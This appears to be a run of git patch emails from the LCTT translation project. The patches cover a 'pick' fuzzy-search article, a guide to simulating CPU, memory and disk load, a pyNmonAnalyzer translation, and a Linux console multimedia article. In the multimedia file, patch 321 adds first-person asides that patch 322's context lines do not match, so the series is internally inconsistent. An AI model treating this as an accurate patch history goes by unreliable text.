+还想看其他例子?还有呢。下面命令让你选择当前目录下的文件或目录,并将之迁移到其他地方去,比如这里我们迁移到 `/home/sk/ostechnix`。
-还想看其他例子?还有呢。下面命令让你选择当前目录下的文件或目录,并将之迁移到其他地方去,比如这里我们迁移到 **/home/sk/ostechnix**。
```
mv "$(find . -maxdepth 1 |pick)" /home/sk/ostechnix/
```
-[![][7]][11]
+![][11]
通过上下按钮选择要迁移的文件,然后按下回车就会把它迁移到 `/home/sk/ostechnix/` 目录中的。
-[![][7]][12]
+![][12]
-从上面的结果中可以看到,我把一个名叫 “abcd” 的目录移动到 "ostechnix" 目录中了。
+从上面的结果中可以看到,我把一个名叫 `abcd` 的目录移动到 `ostechnix` 目录中了。
-使用案例是无限的。甚至 Vim 编辑器上还有一个叫做 [**pick.vim**][13] 的插件让你在 Vim 中选择更加方便。
+使用方式是无限的。甚至 Vim 编辑器上还有一个叫做 [pick.vim][13] 的插件让你在 Vim 中选择更加方便。
要查看详细信息,请参阅它的 man 页。
+
```
man pick
```
-我们的讲解至此就结束了。希望这狂工具能给你们带来帮助。如果你觉得我们的指南有用的话,请将它分享到您的社交网络上,并向大家推荐 OSTechNix 博客。
-
-
+我们的讲解至此就结束了。希望这款工具能给你们带来帮助。如果你觉得我们的指南有用的话,请将它分享到您的社交网络上,并向大家推荐我们。
--------------------------------------------------------------------------------
@@ -118,7 +128,7 @@ via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
作者:[SK][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
@@ -130,9 +140,9 @@ via: https://www.ostechnix.com/pick-commandline-fuzzy-search-tool-linux/
[5]:https://github.com/calleerlandsson/pick/releases/
[6]:https://www.ostechnix.com/create-shortcuts-frequently-used-directories-shell/
[7]:data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7
-[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png ()
-[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png ()
-[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png ()
-[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png ()
-[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png ()
+[8]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_001-3.png
+[9]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_002-1.png
+[10]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_004-1.png
+[11]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_005.png
+[12]:http://www.ostechnix.com/wp-content/uploads/2017/09/sk@sk_006-1.png
[13]:https://github.com/calleerlandsson/pick.vim/
From 63810c64ceb106602efa3174ea342e68a6d40ab0 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 10:10:01 +0800
Subject: [PATCH 316/371] PUB:20170925 A Commandline Fuzzy Search Tool For
Linux.md
@lujun9972 https://linux.cn/article-9234-1.html
---
.../20170925 A Commandline Fuzzy Search Tool For Linux.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename {translated/tech => published}/20170925 A Commandline Fuzzy Search Tool For Linux.md (100%)
diff --git a/translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md b/published/20170925 A Commandline Fuzzy Search Tool For Linux.md
similarity index 100%
rename from translated/tech/20170925 A Commandline Fuzzy Search Tool For Linux.md
rename to published/20170925 A Commandline Fuzzy Search Tool For Linux.md
From 8b53900e7d72ab08201a049d6dc6d1b000125fe1 Mon Sep 17 00:00:00 2001
From: wxy
Date: Sun, 14 Jan 2018 10:32:44 +0800
Subject: [PATCH 317/371] PRF&PUB:20170924 Simulate System Loads.md
@lujun9972 https://linux.cn/article-9235-1.html
---
.../20170924 Simulate System Loads.md | 43 +++++++++----------
1 file changed, 21 insertions(+), 22 deletions(-)
rename {translated/tech => published}/20170924 Simulate System Loads.md (56%)
diff --git a/translated/tech/20170924 Simulate System Loads.md b/published/20170924 Simulate System Loads.md
similarity index 56%
rename from translated/tech/20170924 Simulate System Loads.md
rename to published/20170924 Simulate System Loads.md
index 66b74be5c1..8c079664d9 100644
--- a/translated/tech/20170924 Simulate System Loads.md
+++ b/published/20170924 Simulate System Loads.md
@@ -1,71 +1,70 @@
-模拟系统负载的方法
+在 Linux 上简单模拟系统负载的方法
======
+
系统管理员通常需要探索在不同负载对应用性能的影响。这意味着必须要重复地人为创造负载。当然,你可以通过专门的工具来实现,但有时你可能不想也无法安装新工具。
-每个 Linux 发行版中都自带有创建负载的工具。他们不如专门的工具那么灵活但它们是现成的,而且无需专门学习。
+每个 Linux 发行版中都自带有创建负载的工具。他们不如专门的工具那么灵活,但它们是现成的,而且无需专门学习。
### CPU
下面命令会创建 CPU 负荷,方法是通过压缩随机数据并将结果发送到 `/dev/null`:
+
```
cat /dev/urandom | gzip -9 > /dev/null
-
```
如果你想要更大的负荷,或者系统有多个核,那么只需要对数据进行压缩和解压就行了,像这样:
+
```
cat /dev/urandom | gzip -9 | gzip -d | gzip -9 | gzip -d > /dev/null
-
```
-按下 `CTRL+C` 来暂停进程。
+按下 `CTRL+C` 来终止进程。
-### RAM
+### 内存占用
-下面命令会减少可用内存的总量。它是是通过在内存中创建文件系统然后往里面写文件来实现的。你可以使用任意多的内存,只需哟往里面写入更多的文件就行了。
+下面命令会减少可用内存的总量。它是通过在内存中创建文件系统然后往里面写文件来实现的。你可以使用任意多的内存,只需哟往里面写入更多的文件就行了。
+
+首先,创建一个挂载点,然后将 ramfs 文件系统挂载上去:
-首先,创建一个挂载点,然后将 `ramfs` 文件系统挂载上去:
```
mkdir z
mount -t ramfs ramfs z/
-
```
第二步,使用 `dd` 在该目录下创建文件。这里我们创建了一个 128M 的文件:
+
```
dd if=/dev/zero of=z/file bs=1M count=128
-
```
文件的大小可以通过下面这些操作符来修改:
- + **bs=** 块大小。可以是任何数字后面接上 **B**( 表示字节 ),**K**( 表示 KB),**M**( 表示 MB) 或者 **G**( 表示 GB)。
- + **count=** 要写多少个块
+- `bs=` 块大小。可以是任何数字后面接上 `B`(表示字节),`K`(表示 KB),`M`( 表示 MB)或者 `G`(表示 GB)。
+- `count=` 要写多少个块。
+### 磁盘 I/O
+创建磁盘 I/O 的方法是先创建一个文件,然后使用 `for` 循环来不停地拷贝它。
-### Disk
+下面使用命令 `dd` 创建了一个全是零的 1G 大小的文件:
-创建磁盘 I/O 的方法是先创建一个文件,然后使用 for 循环来不停地拷贝它。
-
-下面使用命令 `dd` 创建了一个充满零的 1G 大小的文件:
```
dd if=/dev/zero of=loadfile bs=1M count=1024
-
```
-下面命令用 for 循环执行 10 次操作。每次都会拷贝 `loadfile` 来覆盖 `loadfile1`:
+下面命令用 `for` 循环执行 10 次操作。每次都会拷贝 `loadfile` 来覆盖 `loadfile1`:
+
```
for i in {1..10}; do cp loadfile loadfile1; done
-
```
-通过修改 `{1。.10}` 中的第二个参数来调整运行时间的长短。
+通过修改 `{1..10}` 中的第二个参数来调整运行时间的长短。(LCTT 译注:你的 Linux 系统中的默认使用的 `cp` 命令很可能是 `cp -i` 的别名,这种情况下覆写会提示你输入 `y` 来确认,你可以使用 `-f` 参数的 `cp` 命令来覆盖此行为,或者直接用 `/bin/cp` 命令。)
若你想要一直运行,直到按下 `CTRL+C` 来停止,则运行下面命令:
+
```
while true; do cp loadfile loadfile1; done
-
```
--------------------------------------------------------------------------------
@@ -73,7 +72,7 @@ via: https://bash-prompt.net/guides/create-system-load/
作者:[Elliot Cooper][a]
译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
+校对:[wxy](https://github.com/wxy)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
From 8e420d2aa87fe35068532bd86f9976349c06c9d2 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Sun, 14 Jan 2018 11:05:10 +0800
Subject: [PATCH 318/371] =?UTF-8?q?20180113-1=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../tech/20180104 How does gdb call functions.md | 0
1 file changed, 0 insertions(+), 0 deletions(-)
rename "sources/tech/20180104 \tHow does gdb call functions.md" => sources/tech/20180104 How does gdb call functions.md (100%)
diff --git "a/sources/tech/20180104 \tHow does gdb call functions.md" b/sources/tech/20180104 How does gdb call functions.md
similarity index 100%
rename from "sources/tech/20180104 \tHow does gdb call functions.md"
rename to sources/tech/20180104 How does gdb call functions.md
From 9535c3e5aae2d58e7ab1910d9ff274a87e764f15 Mon Sep 17 00:00:00 2001
From: ChenYi <31087327+cyleft@users.noreply.github.com>
Date: Sun, 14 Jan 2018 13:22:02 +0800
Subject: [PATCH 319/371] apply for translation
---
sources/tech/20160808 Top 10 Command Line Games For Linux.md | 2 ++
1 file changed, 2 insertions(+)
diff --git a/sources/tech/20160808 Top 10 Command Line Games For Linux.md b/sources/tech/20160808 Top 10 Command Line Games For Linux.md
index ebce8a8073..1dbe6030f3 100644
--- a/sources/tech/20160808 Top 10 Command Line Games For Linux.md
+++ b/sources/tech/20160808 Top 10 Command Line Games For Linux.md
@@ -1,3 +1,5 @@
+ translated by cyleft
+
Top 10 Command Line Games For Linux
======
Brief: This article lists the **best command line games for Linux**.
From e60ec783758dc724f5c6b5824cf2f273a61cb11e Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 14 Jan 2018 16:10:37 +0800
Subject: [PATCH 320/371] translate done: 20121211 Python Nmon Analyzer- moving
away from excel macros.md
---
...Analyzer- moving away from excel macros.md | 101 ------------------
...Analyzer- moving away from excel macros.md | 100 +++++++++++++++++
2 files changed, 100 insertions(+), 101 deletions(-)
delete mode 100644 sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
create mode 100644 translated/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
diff --git a/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md b/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
deleted file mode 100644
index 3591e379d5..0000000000
--- a/sources/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
+++ /dev/null
@@ -1,101 +0,0 @@
-translating by lujun9972
-Python Nmon Analyzer: moving away from excel macros
-======
-[Nigel's monitor][1], dubbed "Nmon", is a fantastic tool for monitoring, recording and analyzing a Linux/*nix system's performance over time. Nmon was originally developed by IBM and Open Sourced in the summer of 2009. By now Nmon is available on just about every linux platfrom and architecture. It provides a great real-time command line visualization of current system statistics, such as CPU, RAM, Network and Disk I/O. However, Nmon's greatest feature is the capability to record system performance snapshots over time.
-For example: `nmon -f -s 1`.
-![nmon CPU and Disk utilization][2]
-This will create a log file starting of with some system metadata(Section AAA - BBBV), followed by timed snapshots of all monitored system attributes, such as CPU and Memory usage. This produces a file that is hard to directly interpret with a spreadsheet application, hence the birth of the [Nmon_Analyzer][3] excel macro. This tool is great, if you have access to Windows/Mac with Microsoft Office installed. If not there is also the Nmon2rrd tool, which generates RRD input files to generate your graphs. This is a very rigid approach and slightly painful. Now to provide a more flexible tool, I am introducing the pyNmonAnalyzer, which aims to provide a customization solution for generating organized CSV files and simple HTML reports with [matplotlib][4] based graphs.
-
-### Getting Started:
-
-System requirements:
-As the name indicates you will need python. Additionally pyNmonAnalyzer depends on matplotlib and numpy. If you are on a debian-derivative system these are the packages you'll need to install:
-```
-$> sudo apt-get install python-numpy python-matplotlib
-
-```
-
-##### Getting pyNmonAnalyzer:
-
-Either clone the git repository:
-```
-$> git clone git@github.com:madmaze/pyNmonAnalyzer.git
-
-```
-
-or
-
-Download the current release here: [pyNmonAnalyzer-0.1.zip][5]
-
-Next we need an an Nmon file, if you do not already have one, either use the example provided in the release or record a sample: `nmon -F test.nmon -s 1 -c 120`, this will record 120 snapshots at 1 second intervals to test.nmon.
-
-Lets have a look at the basic help output:
-```
-$> ./pyNmonAnalyzer.py -h
-usage: pyNmonAnalyzer.py [-h] [-x] [-d] [-o OUTDIR] [-c] [-b] [-r CONFFNAME]
- input_file
-
-nmonParser converts Nmon monitor files into time-sorted
-CSV/Spreadsheets for easier analysis, without the use of the
-MS Excel Macro. Also included is an option to build an HTML
-report with graphs, which is configured through report.config.
-
-positional arguments:
- input_file Input NMON file
-
-optional arguments:
- -h, --help show this help message and exit
- -x, --overwrite overwrite existing results (Default: False)
- -d, --debug debug? (Default: False)
- -o OUTDIR, --output OUTDIR
- Output dir for CSV (Default: ./data/)
- -c, --csv CSV output? (Default: False)
- -b, --buildReport report output? (Default: False)
- -r CONFFNAME, --reportConfig CONFFNAME
- Report config file, if none exists: we will write the
- default config file out (Default: ./report.config)
-
-```
-
-There are 2 main options of using this tool
-
- 1. Turn the nmon file into a set of separate CSV file
- 2. Generate an HTML report with matplotlib graphs
-
-
-
-The following command does both:
-```
-$> ./pyNmonAnalyzer.py -c -b test.nmon
-
-```
-
-This will create a directory called ./data in which you will find a folder of CSV files ("./data/csv/"), a folder of PNG graphs ("./data/img/") and an HTML report ("./data/report.html").
-
-By default the HTML report will include graphs for CPU, Disk Busy, Memory utilization and Network transfers. This is all defined in a self explanitory configuration file, "report.config". At the moment this is not yet very flexible as CPU and MEM are not configurable besides on or off, but one of the next steps will be to refine the plotting approach and to expose more flexibility with which graphs plot which data points.
-
-### Report Example:
-
-[![pyNmonAnalyzer Graph output][6]
-**Click to see the full Report**][7]
-
-Currently these reports are very bare bones and only prints out basic labeled graphs, but development is on-going. Currently in development is a wizard that will make adjusting the configurations easier. Please do let me know if you have any suggestions, find any bugs or have feature requests.
-
---------------------------------------------------------------------------------
-
-via: https://matthiaslee.com/python-nmon-analyzer-moving-away-from-excel-macros/
-
-作者:[Matthias Lee][a]
-译者:[lujun9972](https://github.com/lujun9972)
-校对:[校对者ID](https://github.com/校对者ID)
-
-本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-
-[a]:https://matthiaslee.com/
-[1]:http://nmon.sourceforge.net/
-[2]:https://matthiaslee.com//content/images/2015/06/nmon_cpudisk.png
-[3]:http://www.ibm.com/developerworks/wikis/display/WikiPtype/nmonanalyser
-[4]:http://matplotlib.org/
-[5]:https://github.com/madmaze/pyNmonAnalyzer/blob/master/release/pyNmonAnalyzer-0.1.zip?raw=true
-[6]:https://matthiaslee.com//content/images/2017/04/teaser-short_0.png (pyNmonAnalyzer Graph output)
-[7]:http://matthiaslee.com/pub/pyNmonAnalyzer/data/report.html
diff --git a/translated/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md b/translated/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
new file mode 100644
index 0000000000..c772ceff73
--- /dev/null
+++ b/translated/tech/20121211 Python Nmon Analyzer- moving away from excel macros.md
@@ -0,0 +1,100 @@
+Python 版的 Nmon 分析器:让你远离 excel 宏
+======
+[Nigel's monitor][1],也叫做 "Nmon",是一个很好的监控,记录和分析 Linux/*nix 系统性能随时间变化的工具。Nmon 最初由 IBM 开发并于 2009 年夏天开源。时至今日 Nmon 已经在所有 linux 平台和架构上都可用了。它提供了大量的实时工具来可视化当前系统统计信息,这些统计信息包括 CPU,RAM,网络和磁盘 I/O。然而,Nmon 最棒的特性是可以随着时间的推移记录系统性能快照。
+比如:`nmon -f -s 1`。
+![nmon CPU and Disk utilization][2]
+会创建一个日志文件,该日志文件最开头是一些系统的元数据(章节 AAA - BBBV),后面是定时抓取的监控系统属性的快照,比如 CPU 和内存的使用情况。这个文件很难直接由电子表格应用来处理,因此诞生了 [Nmon_Analyzer][3] excel 宏。如果你用的是 Windows/Mac 并安装了 Microsoft Office,那么这个工具非常不错。如果没有这个环境,那也可以使用 Nmon2rrd 工具,这个工具能将日志文件转换为 RRD 输入文件,进而生成图形。这个过程很死板而且有点麻烦。现在出现了一个更灵活的工具,下面向你们介绍一下 pyNmonAnalyzer,它提供了一个可定制化的方案,用来生成结构化的 CSV 文件,以及基于 [matplotlib][4] 图片的简单 HTML 报告。
+
+### 入门介绍:
+
+系统需求:
+从名字中就能看出我们需要有 python。此外 pyNmonAnalyzer 还依赖于 matplotlib 和 numpy。若你使用的是 debian 衍生的系统,则你需要先安装这些包:
+```
+$> sudo apt-get install python-numpy python-matplotlib
+
+```
+
+##### 获取 pyNmonAnalyzer:
+
+你可以克隆 git 仓库:
+```
+$> git clone git@github.com:madmaze/pyNmonAnalyzer.git
+
+```
+
+或者
+
+直接从这里下载:[pyNmonAnalyzer-0.1.zip][5]
+
+接下来我们需要一个 Nmon 文件。如果没有的话,可以使用发行版中提供的示例,或者自己录制一个样本:`nmon -F test.nmon -s 1 -c 120`,该命令会每隔 1 秒抓取一次快照,共录制 120 个快照到 test.nmon 文件中。
+
+让我们来看看基本的帮助信息:
+```
+$> ./pyNmonAnalyzer.py -h
+usage: pyNmonAnalyzer.py [-h] [-x] [-d] [-o OUTDIR] [-c] [-b] [-r CONFFNAME]
+ input_file
+
+nmonParser converts Nmon monitor files into time-sorted
+CSV/Spreadsheets for easier analysis, without the use of the
+MS Excel Macro. Also included is an option to build an HTML
+report with graphs, which is configured through report.config.
+
+positional arguments:
+ input_file Input NMON file
+
+optional arguments:
+ -h, --help show this help message and exit
+ -x, --overwrite overwrite existing results (Default: False)
+ -d, --debug debug? (Default: False)
+ -o OUTDIR, --output OUTDIR
+ Output dir for CSV (Default: ./data/)
+ -c, --csv CSV output? (Default: False)
+ -b, --buildReport report output? (Default: False)
+ -r CONFFNAME, --reportConfig CONFFNAME
+ Report config file, if none exists: we will write the
+ default config file out (Default: ./report.config)
+
+```
+
+该工具有两个主要的选项
+
+ 1. 将 nmon 文件转换成一系列独立的 CSV 文件
+ 2. 使用 matplotlib 生成带图形的 HTML 报告
+
+
+
+下面命令既会生成 CSV 文件,也会生成 HTML 报告:
+```
+$> ./pyNmonAnalyzer.py -c -b test.nmon
+
+```
+
+这会创建一个 `./data` 目录,其中有一个存放 CSV 文件的目录(`./data/csv/`)、一个存放 PNG 图片的目录(`./data/img/`)以及一个 HTML 报告(`./data/report.html`)。
+
+默认情况下,HTML 报告中会用图片展示 CPU、磁盘繁忙度、内存使用情况和网络传输情况。所有这些都定义在一个自解释的配置文件中("report.config")。目前这个工具还不是特别灵活,因为 CPU 和 MEM 除了 on 和 off 外,无法做其他的配置。不过下一步将会改进作图的方法,并允许用户灵活地指定针对哪些数据使用哪种作图方法。
+
+### 报告的例子:
+
+[![pyNmonAnalyzer Graph output][6]
+**Click to see the full Report**][7]
+
+目前这些报告还十分的枯燥而且只能打印出基本的几种标记图表,不过它的功能还在不断的完善中。目前在开发的是一个向导来让配置调整变得更容易。如果有任何建议,找到任何 bug 或者有任何功能需求,欢迎与我交流。
+
+--------------------------------------------------------------------------------
+
+via: https://matthiaslee.com/python-nmon-analyzer-moving-away-from-excel-macros/
+
+作者:[Matthias Lee][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://matthiaslee.com/
+[1]:http://nmon.sourceforge.net/
+[2]:https://matthiaslee.com//content/images/2015/06/nmon_cpudisk.png
+[3]:http://www.ibm.com/developerworks/wikis/display/WikiPtype/nmonanalyser
+[4]:http://matplotlib.org/
+[5]:https://github.com/madmaze/pyNmonAnalyzer/blob/master/release/pyNmonAnalyzer-0.1.zip?raw=true
+[6]:https://matthiaslee.com//content/images/2017/04/teaser-short_0.png (pyNmonAnalyzer Graph output)
+[7]:http://matthiaslee.com/pub/pyNmonAnalyzer/data/report.html
From 4e72cb886de22f200e19977f21bab856bcff5524 Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 14 Jan 2018 16:14:37 +0800
Subject: [PATCH 321/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Multimedia=20Apps?=
=?UTF-8?q?=20for=20the=20Linux=20Console?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...1 Multimedia Apps for the Linux Console.md | 106 ++++++++++++++++++
1 file changed, 106 insertions(+)
create mode 100644 sources/tech/20180111 Multimedia Apps for the Linux Console.md
diff --git a/sources/tech/20180111 Multimedia Apps for the Linux Console.md b/sources/tech/20180111 Multimedia Apps for the Linux Console.md
new file mode 100644
index 0000000000..3f3849db6c
--- /dev/null
+++ b/sources/tech/20180111 Multimedia Apps for the Linux Console.md
@@ -0,0 +1,106 @@
+Multimedia Apps for the Linux Console
+======
+When last we met, we learned that the Linux console supports multimedia. Yes, really! You can enjoy music, movies, photos, and even read PDF files, all without being in an X session, using MPlayer, fbi, and fbgs. And, as a bonus, you can enjoy a Matrix-style screensaver for the console, CMatrix.
+
+You will probably have to make some tweaks to your system to make this work. The examples used here are for Ubuntu Linux 16.04.
+
+### MPlayer
+
+You're probably familiar with the amazing and versatile MPlayer, which supports almost every video and audio format, and runs on nearly everything, including Linux, Android, Windows, Mac, Kindle, OS/2, and AmigaOS. Using MPlayer in your console will probably require some tweaking, depending on your Linux distribution. To start, try playing a video:
+```
+$ mplayer [video name]
+
+```
+
+If it works, then hurrah, and you can invest your time in learning useful MPlayer options, such as controlling the size of the video screen. However, some Linux distributions are managing the framebuffer differently than in the olden days, and you may have to adjust some settings to make it work. This is how to make it work on recent Ubuntu releases.
+
+First, add yourself to the video group.
+
+Second, verify that `/etc/modprobe.d/blacklist-framebuffer.conf` has this line: `#blacklist vesafb`. It should already be commented out, and if it isn't then comment it. All the other `blacklist` lines should stay un-commented, which prevents those modules from loading. Side note: if you want to dig more deeply into managing your framebuffer, the module for your video card may give better performance.
+
+Add these two modules to the end of `/etc/initramfs-tools/modules`, `vesafb` and `fbcon`, then rebuild the initramfs image:
+```
+$ sudo nano /etc/initramfs-tools/modules
+ # List of modules that you want to include in your initramfs.
+ # They will be loaded at boot time in the order below.
+ fbcon
+ vesafb
+
+$ sudo update-initramfs -u
+
+```
+
+[fbcon][1] is the Linux framebuffer console. It runs on top of the framebuffer and adds graphical features. It requires a framebuffer device, which is supplied by the `vesafb` module.
+
+Now you must edit your GRUB2 configuration. In `/etc/default/grub` you should see a line like this:
+```
+GRUB_CMDLINE_LINUX_DEFAULT="quiet splash"
+
+```
+
+It may have some other options, but it should be there. Add `vga=789`:
+```
+GRUB_CMDLINE_LINUX_DEFAULT="quiet splash vga=789"
+
+```
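+
+One step the article doesn't mention (so this is my addition): on Ubuntu, edits to `/etc/default/grub` only take effect after you regenerate the GRUB configuration, so run this before rebooting:
+
+```
+sudo update-grub
+
+```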
+
+Reboot and enter your console (Ctrl+Alt+F1), and try playing a video. This command selects the `fbdev2` video device; I haven't learned yet how to know which one to use, but I had to use it to play the video. The default screen size is 320x240, so I scaled it to 960:
+```
+$ mplayer -vo fbdev2 -vf scale -zoom -xy 960 AlienSong_mp4.mov
+```
+
+And behold Figure 1. It's grainy because I have a low-fi copy of this video, not because MPlayer is making it grainy.
+
+MPlayer plays CDs, DVDs, network streams, and has a giant batch of playback options, which I shall leave as your homework to explore.
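+
+To get you started on that homework, here are a couple of hypothetical examples (mine, not from the article; the exact DVD title number or stream URL will depend on your setup):
+
+```
+mplayer -vo fbdev2 dvd://1
+mplayer -vo fbdev2 http://example.com/stream.mp3
+
+```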
+
+### fbi Image Viewer
+
+`fbi`, the framebuffer image viewer, comes in the [fbida][2] package on most Linuxes. It has native support for the common image file formats, and uses `convert` (from Image Magick), if it is installed, for other formats. Its simplest use is to view a single image file:
+```
+$ fbi filename
+
+```
+
+Use the arrow keys to scroll a large image, + and - to zoom, and r and l to rotate 90 degrees right and left. Press the Escape key to close the image. You can play a slideshow by giving `fbi` a list of files:
+```
+$ fbi --list file-list.txt
+
+```
+
+`fbi` supports autozoom. With `-a`, `fbi` chooses the zoom factor automatically. `--autoup` and `--autodown` tell `fbi` to only zoom up or down. Control the blend time between images with `--blend [time]`, in milliseconds. Press the k and j keys to jump behind and ahead in your file list.
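+
+Putting those options together (an example of my own, using only the flags described above):
+
+```
+fbi -a --blend 500 --list file-list.txt
+
+```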
+
+`fbi` has commands for creating file lists from images you have viewed, and for exporting your commands to a file, and a host of other cool options. Check out `man fbi` for complete options.
+
+### CMatrix Console Screensaver
+
+The Matrix screensaver is still my favorite (Figure 2), second only to the bouncing cow. [CMatrix][3] runs on the console. Simply type `cmatrix` to start it, and Ctrl+C stops it. Run `cmatrix -s` to launch it in screensaver mode, which exits on any keypress. `-C` changes the color. Your choices are green, red, blue, yellow, white, magenta, cyan, and black.
+
+CMatrix supports asynchronous key presses, which means you can change options while it's running.
+
+`-B` is all bold text, and `-b` is partially bold.
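+
+For example, to run it as a screensaver in red with all-bold text (just combining the options above):
+
+```
+cmatrix -s -B -C red
+
+```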
+
+### fbgs PDF Viewer
+
+It seems that the addiction to PDF documents is pandemic and incurable, though PDFs are better than they used to be, with live hyperlinks, copy-paste, and good text search. The `fbgs` console PDF viewer is part of the `fbida` package. Options include page size, resolution, page selections, and most `fbi` options, with the exceptions listed in `man fbgs`. The main option I use is page size; you get `-l`, `-xl`, and `-xxl` to choose from:
+```
+$ fbgs -xl annoyingpdf.pdf
+
+```
+
+Learn more about Linux through the free ["Introduction to Linux"][4] course from The Linux Foundation and edX.
+
+--------------------------------------------------------------------------------
+
+via: https://www.linux.com/learn/intro-to-linux/2018/1/multimedia-apps-linux-console
+
+作者:[][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:
+[1]:https://www.mjmwired.net/kernel/Documentation/fb/fbcon.txt
+[2]:https://www.kraxel.org/blog/linux/fbida/
+[3]:http://www.asty.org/cmatrix/
+[4]:https://training.linuxfoundation.org/linux-courses/system-administration-training/introduction-to-linux
From 394d943093cff8e800cd6ccf1481b686386a3f4c Mon Sep 17 00:00:00 2001
From: darksun
Date: Sun, 14 Jan 2018 16:17:44 +0800
Subject: [PATCH 322/371] add done: 20180111 Multimedia Apps for the Linux
Console.md
---
.../20180111 Multimedia Apps for the Linux Console.md | 8 ++++++--
1 file changed, 6 insertions(+), 2 deletions(-)
diff --git a/sources/tech/20180111 Multimedia Apps for the Linux Console.md b/sources/tech/20180111 Multimedia Apps for the Linux Console.md
index 3f3849db6c..1b9171a795 100644
--- a/sources/tech/20180111 Multimedia Apps for the Linux Console.md
+++ b/sources/tech/20180111 Multimedia Apps for the Linux Console.md
@@ -1,5 +1,9 @@
Multimedia Apps for the Linux Console
======
+
+![](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/multimedia.jpg?itok=v-XrnKRB)
+The Linux console supports multimedia, so you can enjoy music, movies, photos, and even read PDF files.
+
When last we met, we learned that the Linux console supports multimedia. Yes, really! You can enjoy music, movies, photos, and even read PDF files without being in an X session with MPlayer, fbi, and fbgs. And, as a bonus, you can enjoy a Matrix-style screensaver for the console, CMatrix.
You will probably have make some tweaks to your system to make this work. The examples used here are for Ubuntu Linux 16.04.
@@ -93,13 +97,13 @@ Learn more about Linux through the free ["Introduction to Linux" ][4]course from
via: https://www.linux.com/learn/intro-to-linux/2018/1/multimedia-apps-linux-console
-作者:[][a]
+作者:[Carla Schroder][a]
译者:[译者ID](https://github.com/译者ID)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
-[a]:
+[a]:https://www.linux.com/users/cschroder
[1]:https://www.mjmwired.net/kernel/Documentation/fb/fbcon.txt
[2]:https://www.kraxel.org/blog/linux/fbida/
[3]:http://www.asty.org/cmatrix/
From 182b992e6a523232c58e0b4e78c74e13176d56a8 Mon Sep 17 00:00:00 2001
From: darksun